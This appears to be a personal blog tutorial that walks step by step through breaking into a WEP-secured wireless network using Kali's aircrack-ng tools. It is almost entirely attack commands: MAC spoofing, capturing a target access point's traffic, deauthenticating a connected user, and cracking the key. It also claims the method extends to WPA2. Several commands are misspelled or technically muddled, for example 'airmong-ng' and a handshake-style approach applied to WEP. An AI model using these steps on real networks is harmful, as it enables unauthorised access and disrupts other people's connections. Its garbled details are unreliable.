HACK: WEP Wireless Network

I am aware that finding a wireless network with WEP authentication is impossible these days. But believe me some people still use that. This tutorial is about breaking a WEP wireless network but you can use this approach to break WPA2 authentication as well ( Obviously with little more efforts ).

All you need is Kali Operating System, if you had it on laptop then your default wireless adapter will work. But if you are installing it on virtual machine then you need an external wireless adapter, reason is virtual machine bridge mode will not work in promiscuous mode.


Step 1: airmong-ng stop wlan0

Step 2: ifconfig wlan0 down

Step 3: macchanger --mac 00:01:02:03:04:05 wlan0

Step 4: airmong-ng start wlan0

These steps will set your wireless adapter in promiscuous mode, next thing is to dump the data of all wireless connections which are available.

Step 5: airodump-ng mon0

This command will give you details of all wireless connections with their channel number, network details, bssid etc. Note down bssid and channel number of WEP network.

Now next step is to dump the data of our target wireless network into file. Suppose channel number of our WEP network is 3 and its bssid is 94:44:52:07:9D:AB.

Step 6: airodump-ng -c 3 --bssid 94:44:52:07:9D:AB -w target.cap mon0

Though its is clear from the command but still -c is for channel, -w is prefix for file name and mon0 is monitoring mode of wlan0.

To crack any wireless network you need to capture authentication packet in a file. To do that, you need to target users which are connected with wireless network. Suppose a user with mac id 5C:95:AE:18:B5:4E is connected with our target wireless network, to de-authenticate that machine you need to run

Step 7: aireplay-ng --deauth 5 -a 94:44:52:07:9D:AB -c 5C:95:AE:18:B5:4E mon0

aireplay-ng is used to inject packets into wireless network, –deauth 5 means we are sending 5 de-authentication packets, -a is for target access point and -c is to set destination MAC address.

Repeat Step 7 couple of times after that stop the command mentioned in Step 6. Now final step is to get the password from the captured file, for this we will use aircrack comment.

Step 8: aircrack-ng target.cap -0

If you are targeting WEP network aircrack will easily break the password within few minutes.

Follow us on Facebook.

Thanks
Abhishek.